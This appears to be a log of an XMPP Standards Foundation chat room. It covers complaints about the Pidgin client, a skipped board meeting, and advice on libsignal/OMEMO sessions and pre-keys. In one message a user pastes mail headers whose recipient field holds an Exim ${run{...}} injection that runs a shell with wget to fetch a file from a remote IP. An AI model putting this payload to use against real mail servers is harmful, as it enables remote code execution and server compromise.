XSF Discussion - 2019-06-27

https://techcrunch.com/2019/06/26/india-government-inhouse-chat-app-whatsapp/

edhelas: thumbsup !

related HN thread https://news.ycombinator.com/item?id=20291889#20292122

if you guys wants to reply

Daniel, are you here?

Yagiza: it's probably better if you just ask your question since there are other people in here who can answer them as well

As lovetox demonstrated yesterday

Daniel, ok

So, once session_cipher is created, I don't need session_builder anymore?

Is it possible to add Psi here https://xmpp.org/getting-started/ ?

ah there is a list on another page. ok.

https://xmpp.org/software/clients.html ?

so the first list is discriminating all other clients :)

It would be nice if there were more detailed getting-started tutorials, with pictures and stuff. Maybe you could do one for Psi?

"get a client, get an account, done!" seems a bit bare

Let's not have another fight over this page 😕

maybe clients should make tutorials superfluous by having proper onboarding

with server lists and stuff

and then we can make it a criterium for a client to have that type of flow to be listed on getting_started

and Ge0rG can finally get rid of his pidgin

I don't see Pidgin there

oh, so that was fixed already

what's wrong with Pidgin?

lack of support for any modern XMPP feature?

and don’t get me started on plugins

tl;dr: everything is wrong

you know, pidgin, the type of client where you have to ask "did you write anything?" when the peer goes off- and online, because it doesn’t have stream management *or* MAM

you know, pidgin, the type of client where you need to make other clients resource-lock to, otherwise you don’t get messages (no carbons)

you know, pidgin, the type of client where you have to consciously log off before switching networks/suspending to not lose messages (again, no SM or MAM)

you know, pidgin, the type of client which has an architecture which makes it easy for crypto plugins to accidentally send plaintext instead of ciphertext when you start a message with "/me"

(I’m stopping now)

fail.

bahaha

Why poezio.. why..

"//me" doesn't even work

it can’t

and you know why :)

that’s why you want to rant about it

you need ///me

Yes

and then everyone will see "//me" :)

jonas’, why I have you, can you merge this plz https://github.com/xsf/xmpp.org/pull/582 :)

Well I always used Pidgin just like a transport for spectrum =)

I think there are also horror stories with that

pep., I don’t have github credentials at work

oh, spectrum with libpurple? you know, the IRC transport where you would get disconnected when you sent a message starting with ``/quit`` to the transport?

or was it the transport where you would get disconnected when you sent a multi-line message like: foo QUIT :bar

to get disconnected?

I *am* in a ranty mood today.

unfortunately Pidgin's Skype integration is full of bugs. That's what I needed at most last time.

moparisbest: someone comment 127.0.0.1 or number ip is not importamr and this is LIE. today mi friend comment someone connect from 127.0.0.1 and send this: Return-Path: <root@1ur.com> X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@yourdomain.com Delivered-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@yourdomain.com Received: from localhost (localhost [127.0.0.1]) by yourdomain.com (Postfix) with ESMTP id A94DBA00B30 for <root+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@yourdomain.con>; Wed, 26 Jun 2019 02:58:45 +0200 (CEST) X-Quarantine-ID: <UdVj8nzxJJRS> X-Virus-Scanned: Debian amavisd-new at yourdomain.com X-Amavis-Alert: BAD HEADER SECTION, Missing required header field: "Date" Message-Id: <20190626005845.A94DBA00B30@yourdomain.com> Date: Wed, 26 Jun 2019 02:58:45 +0200 (CEST) From: root@1ur.com

neshtaxmpp, this room is not about email.

jonas’: it is about sslh and someone try hack my friend server throught sslh. i need someone commment how sslh sopve apache2 to show real ip and block 127.0.0.1 not to be used outside internet.

this room also is not about sslh

or sysadmin in general

neshtaxmpp, tell your fried to visit a local hackerspace to get help, but please do not bother the people in this room about it.

vanitasvitae, I wish hackerspaces were as big a thing anywhere else than they are in germany, but it's not the case :(

I'm not entirely sure hackerspaces want to be a replacement for search engines

Maybe there's even a support venue for sslh itself.

Ralph and Matt can't make it.

if you're not on a reliable connection, we might as well skip the meeting, unless something important needs to be handled.

(assuming that nyco is here, in the first place)

Right

good guess

do we skip this meeting or not?

let me check the board

followup on badges is ok, I've not done the poll yet

so yes, I think we need more members to really advance

I guessed that, yes

ok, let's skip this meeting then.

three is good from a bylaws standpoint, but imho not enough for debate and decision making

agreed

ok

so, bang, and bang, done, thx all, +1W ;-)

have a good flight, Seve 🙂

I believe I can flyyyyy

😁

If your pilot sings that: run.

Oh... Haha

If I hear that, it may be too late

Aw, what a pity. I wanted to provide an update regarding the German government contact.

Ge0rG - could you do that by mail, if it's longer than 2 sentences?

Do you need our input to progress?

Guus: yes I can. No input needed so far. Should I write to members@?

if it's of interest to the members, yes. Otherwise: did we solve that Board mailing thingy?

(Seve?)

Well...

Where can I get session_cipher to decrypt pre_key_signal_message?

Guus: IIRC somebody is now looking for external mail to board@ or somesuch

Ge0rG, Seve typically does that

(Who's now in a plane)

Ge0rG if you're unsure if it's suitable for members@, mail it to me, and I'll forward it to board@

Guus: I'll try to write down something when I have a bit of time. Don't think there are any issues with using members@

tx

Yagiza, yes session is only once build, after that you load the session from the database and use it to decrypt and encrypt

lovetox, so, I have different question.

lovetox, how to generate session_cipher to decrypt pre_key_signal_message?

Do I have to decrypt it with a key, generated with empty session_builder (before session_builder_process_pre_key_bundle()) call?

hm i cant talk much about the C lib but in the python port

you create a new session_cipher

then use ession_cipher.decryptPkmsg(pre_key_message)

and the decryptPkmsg, does create a new session on its own and saves it to the database

so nothing more to do here

is there something similar in the C version?

there session_cipher_decrypt_pre_key_signal_message

looked it up

it does everything for you

create a new session, store it to the db, decrypt the message

lovetox, so, after that call, current session is invalidated and new session is created instead?

yes

thats also how you refresh a session, you just send a new pkmg

but normally this should not be necessery

lovetox, do I need to generate new session_cipher after that?

session_cipher is only a wrapper

it does not hold any state itself

you call decrypt or encrypt on it, what it does is it loads the session from the database everytime

you can also recreate it after each message if you want

lovetox, so, once session is changed, existing session_cipher will use a new session data?

yes

i create it on the first message for each contact

and cache it

but you dont have to, you can also create it on every message new, does not make a difference

lovetox, IC

session is loaded on each message, modified and stored back to database

otherwise it would be highly likely that you have invalid session if your application crashes

so no state is hold in memory

lovetox, ok

lovetox, so, I need session_builder only when initiating session. If session initiated by other party, it is created by session_cipher_decrypt_pre_key_signal_message(), right?

yes

lovetox, IC. Thank you.

lovetox, and the last question.

lovetox, how do I decide, to which resources of my contact do I need to send encrypted messages, and to which of them not encrypted? Only by checking if it has 'eu.siacs.conversations.axolotl.devicelist+notify' #disco feature?

no

you dont send messages to resources

or better said all messages you send will arrive at all resources of the contact

because of carbons, mam etc

lovetox, I can't be sure that all of resources of my contact do support OMEMO.

you dont change anything about how you send a message

Yagiza, you can be sure that one device supports it

and thats enough

the user decides if he wants to send encrypted or not

not the client

lovetox, what do you mean? I have a contact. And I se all of their resources. And I can choose to which of them to send message.

lovetox, at least, my cliend allows that.

so your client makes the server not save the message in MAM

?

otherwise you cant control who downloads a message from the archive

lovetox, my client to not support MAM yet.

but the server has

lovetox, so?

and the server stores all messages in MAM

if you want or not

lovetox, ok

and other clients will download it

dont assume you can control who gets the message

other than the barejid

you find keys in pep

then you know at least one device of the contact supports it

and afterwards you give your user the decision if he wants to talk encrypted or not

lovetox, anyway. When I send encrypted message, clients, which do not support OMEMO will just ignore it. When I send unencrypted message, all the clients may read and display it.

yes

And I can't be sure, that my or their server do support MAM.

and you cant know if the user is fine with that

the user maybe totally fine with one of his devices ignoring omemo

and only one device beeing able to decrypt

Yes

i just try to save you implementation trouble, you can try to make logic that start and stops encrypting if this and that happens

but i tell you from experience users will come and tell you they want to make the decision themself

especially disco info is useless here

So, if user enabled OMEMO encryption for a contact, but selected a resource, which do not support it, I must somehow make him aware of the fact and send unencrypted messages in that case.

it only works if a client is online

omemo works also if the contact is offline

dont forget that

lovetox, yes. That's not a problem.

Yagiza, why do you even have UI where the user selects a resoure

lovetox, I'm telling only about the sace above.

lovetox, because that's a good tradition.

if i talk as a user, i dont care how many devices are online of my friend, i just want to send him a message

lovetox, not all the servers do support MAM or Message Archving or Message Carbons.

Yagiza, then we should tell the admins to upgrade

So, it's a good thing to have an ability to specify a resource.

i cant help you with that, thats not a usecase for me to write clients for servers from the stoneage

lovetox, IC. So, you think sending messages to bare JID is a good idea?

Yagiza, thats not what i wanted to say, allthough many devs in the community would answer that question with yes

what i want to say is, that i think its bad UI if you make the user force a resource

because user has to know about what a resource is, that is xmpp protocol stuff

users just want to write messages

and you should no assume only because you adress a message to a resource, that only this resource will get the message

lovetox, yes, of course.

that is 99% wrong assumption in our current world

send to the bare JID

you’ll be in pain when IM-NG lands otherwise :)

When is that :/

Any client/server already doing things with it? More than what MattJ said at the summit

I think there was some discussion about that type of stuff the other day

but don’t pin me down on tha

I wish I had time to experiment with things, but so many fires to fight these weeks

People in IT always playing with fire..

ha

Though with the current temperature..

https://upload.bouah.net/upload/_tGYZRYmjJHFBvmx/hrsPzCX6ROecghJJhbvNXA.jpg

holy smokes

I feel sorry for you

and I thought we had bad luck with the 38°C yesterday

(dropped to 25°C today)

i dont find the xep that defines dataforms for disco info

ah 128

And one more question...

After I processed PreKeySignalMessage, an appropriate pre key is automatically substituted with a new one? So, I only need to refresh the bundle on the PEP server?

no

the prekey which was used, is deleted from the database

but no new keys are generated

you have to do this yourself

and of course you should instantly delete the prekey used from pep

lovetox, so, I need generate a new key instead of used one? Ok.

you dont have to generate new ones, i mean we publish 100 keys

you can also generate new ones when you reach 90 or something like this

but you have to delete the used one from pep, so you have to push 99 keys anyway

so i would say just generate one and push 100 again

lovetox, I aware about publishing new bundle of 100 keys.

lovetox, the only question was about generating a new key instead of used one.

im not following, if a key is used, you only have 99, if you aware that you should have 100 keys

what is there for other option than generate 1 new key?

lovetox, I didn't know old key is deleted and a new one is generated automatically, or not. So, once you told me that it is deleted, but no new key is generated, I understand, that I only need to generate a new key to replace used one.

ah ok :)

and Yagiza we should move the discussion to xmpp:jdev@conference.jabber.org?join this room is more suited

lovetox, yes. I tried to ask there, but almost no one replied.

im always joined there :)

lovetox, me too.

Yagiza: you could take a look at https://blog.jabberhead.tk/2019/04/15/closer-look-at-the-double-ratchet/ to understand the inner workings of the signal protocol.

vanitasvitae, ok, thank you!

can someone verify that the example here is wrong https://xmpp.org/extensions/xep-0128.html#examples

as it has a field without type which means text-single

but still has multiple <values>

which is a MUST NOT in 0004

or am i missing something

jonas’, vanitasvitae: I've tried more than once to help neshtaxmpp by linking him to exactly what he was asking for etc, he's either a troll or beyond help, I just ignore now

moparisthebest, yeah I have also given in this domain :)

Yeah I also dealt with him repeatedly :D